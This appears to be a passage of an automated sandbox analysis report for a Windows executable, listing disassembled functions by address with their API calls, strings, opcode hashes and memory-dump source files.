                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9A968 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileType
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3081899298-0
                                                                                                                                                                                                              • Opcode ID: c39f4476cc59087d02f7cb1bea003a4bc2482edead308a9328c245ec26982a56
                                                                                                                                                                                                              • Instruction ID: 730409591996bfcc700ddc39bfed661b2195a30e41afea82bfd136c6260711df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c39f4476cc59087d02f7cb1bea003a4bc2482edead308a9328c245ec26982a56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCD0C912D09481C2D9106779D9511BDA354BF42735FE90720D23EC26E1CE1DA4969220
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE91C Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1611563598-0
                                                                                                                                                                                                              • Opcode ID: 5338a235c8d50967549d23fbf21572ed64d44ed7639b9633c157d133c87d5f2d
                                                                                                                                                                                                              • Instruction ID: ab594375e5c31017114bfed3cb7c18d1c2cc50e09ab3d7735b8036c68488e38e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5338a235c8d50967549d23fbf21572ed64d44ed7639b9633c157d133c87d5f2d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7A01100F02882C2AA083B338C8A20A82283B88B00FC88020C00880220CE0C80AA0B20
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBDAB8 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 858070ee4c7a19a662da5472fdf2854117c285a8e3d5fc64c6be807d930a04b3
                                                                                                                                                                                                              • Instruction ID: d643be036d303c70321791cbef42344a1278ac475ab76ae5db824f73dd825e1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 858070ee4c7a19a662da5472fdf2854117c285a8e3d5fc64c6be807d930a04b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2011E85E0DAC3C6F9787A7255402F9D6509F4CBE0FDC4231D91D862DADD2CEC418239
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00007FF75FBB0310 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 247windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$DialogMessageSendText
                                                                                                                                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                                              • API String ID: 910434759-1840816070
                                                                                                                                                                                                              • Opcode ID: c3c3ed74e938baa14d5c2cf217ad25db750c0378dc98c5fe9ae4ac5dc393dbfb
                                                                                                                                                                                                              • Instruction ID: 3ca374d41b474e18928f1647fcfc0c5fab8272d1ca2e92e944fe5dc81c415506
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3c3ed74e938baa14d5c2cf217ad25db750c0378dc98c5fe9ae4ac5dc393dbfb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDC14E62A09AC2D6EB24EF21E4547EEB365FB88784F884135DA4D07B98DF3CD605C750
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB97B08 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 302fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wcscpy.LIBCMT ref: 00007FF75FB97C12
                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00007FF75FB97CDF
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB98818: GetCurrentProcess.KERNEL32 ref: 00007FF75FB9882C
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB98818: GetLastError.KERNEL32 ref: 00007FF75FB9888D
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB98818: CloseHandle.KERNEL32 ref: 00007FF75FB988A0
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B34C: DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00007FF75FB9A5D6), ref: 00007FF75FB9B362
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B34C: DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB9A5D6), ref: 00007FF75FB9B38D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Delete$CloseCreateCurrentErrorHandleLastProcesswcscpy
                                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                              • API String ID: 344333846-3508440684
                                                                                                                                                                                                              • Opcode ID: 9373064844497a59616c83af1e79c41c248783c4f2bfcb2cee9c9992ae998866
                                                                                                                                                                                                              • Instruction ID: 94b44bc1f576edcd6b82c9b598e96c13f097ac1fd28715aeb9bf5da3c286048a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9373064844497a59616c83af1e79c41c248783c4f2bfcb2cee9c9992ae998866
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33D1B021A186C7C6EB20FB30DA516FEA7A4FF41784F984131EA5E47696DE3CE605C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE32C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                                                                                                                              • String ID: PNG
                                                                                                                                                                                                              • API String ID: 541704414-364855578
                                                                                                                                                                                                              • Opcode ID: c62717658c49ab0d377c9b75c93c06e0e9c0f3e91180a37dbb4cee33c3ad5a88
                                                                                                                                                                                                              • Instruction ID: da5737e8145c965c4cf9f569c45daba403807b167a13b4ef8f3a95f69e3ef388
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c62717658c49ab0d377c9b75c93c06e0e9c0f3e91180a37dbb4cee33c3ad5a88
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD410B21A1AB87C2EA05AF26A4543BAE3A5EF88B94F8C4435CD4D47364DF7DE8458360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB41FC Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                              • Opcode ID: f76cef65e92a4e7a623e1119a2a3228cb782f8c1d95428c2b9bf8a41d6f41bc7
                                                                                                                                                                                                              • Instruction ID: 42cd1845bf4be677548e0ce92d53ce2543d04139f052f0bb8f97ff06f18f183f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f76cef65e92a4e7a623e1119a2a3228cb782f8c1d95428c2b9bf8a41d6f41bc7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B311072A09BC1CAEB60AF74E8503EA7364FB84744F884439DA4D47694DF3CD548C724
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBDB3C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                              • Opcode ID: 999f5204d7d27e20891f748af150e6bb6311fb86a7a1ffe72f59afb7fad68174
                                                                                                                                                                                                              • Instruction ID: 46de3f091e99632af1e9bce929c4b08f8ee1cc37e59ac03d23bf7704fac2ee86
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 999f5204d7d27e20891f748af150e6bb6311fb86a7a1ffe72f59afb7fad68174
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD315D36A08BC1C6DB609F35E8442EAB3A4FB88754F980136EA9D43B58DF3CD545CB10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC0664 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75FBC0694
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBBDD68: GetCurrentProcess.KERNEL32(00007FF75FBC189D), ref: 00007FF75FBBDD95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                              • API String ID: 2518042432-3972193922
                                                                                                                                                                                                              • Opcode ID: 1209616fce3ea76e13f64f75d1279e60e03e8112c51f4f4e7f73f43a46040227
                                                                                                                                                                                                              • Instruction ID: 3d69c5f0512364223190bcb9e653d90bc54a99769f72870d0435e1bf9e5f42b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1209616fce3ea76e13f64f75d1279e60e03e8112c51f4f4e7f73f43a46040227
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C751D362B147D6C1EB14EFB298000EEB3A4BB48BD8B884132DE5D57B85DE3CD4418B20
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAEC5C Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2169056816-0
                                                                                                                                                                                                              • Opcode ID: 15cfc4a8696289d79a07c41cbab0834ad782be6fab6ac0d2d69f2fd5f6ce1e5c
                                                                                                                                                                                                              • Instruction ID: 8c065a685de800becf02be0edc04ee6c650b781a5520e5f2faaf12d8c0b49cfc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15cfc4a8696289d79a07c41cbab0834ad782be6fab6ac0d2d69f2fd5f6ce1e5c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD115B76A19B81C6E350EF21E8006D9B3A4FB88B84FC88136DA8C43724DF3CE946C755
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB976CC Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                              • Opcode ID: 55ff6a5b7a520442b1c29396c5a37b0e5e1f4287dbbfeb61271c2574be488b40
                                                                                                                                                                                                              • Instruction ID: 083345059f3b369cf4a5d43fce21e89e2d859752ac45bc8e636059019264a028
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55ff6a5b7a520442b1c29396c5a37b0e5e1f4287dbbfeb61271c2574be488b40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38E0E572B18682C2E7109F32B44036BE294BF55BC4F58C134DA4943A94CF3CC4118710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAD0B8 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscat$AllocByteCharGlobalMultiWidewcscpy
                                                                                                                                                                                                              • String ID: $</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                                              • API String ID: 2461171529-1507786326
                                                                                                                                                                                                              • Opcode ID: 519e2b0d67bc7cbee871fe28f46aaea295df2e0b644bca33ec10204b6f91ccc5
                                                                                                                                                                                                              • Instruction ID: 31395ac21418d715d0d35c87473f7ed6f9ead45bbc9a1cb7852119fc1809d918
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 519e2b0d67bc7cbee871fe28f46aaea295df2e0b644bca33ec10204b6f91ccc5
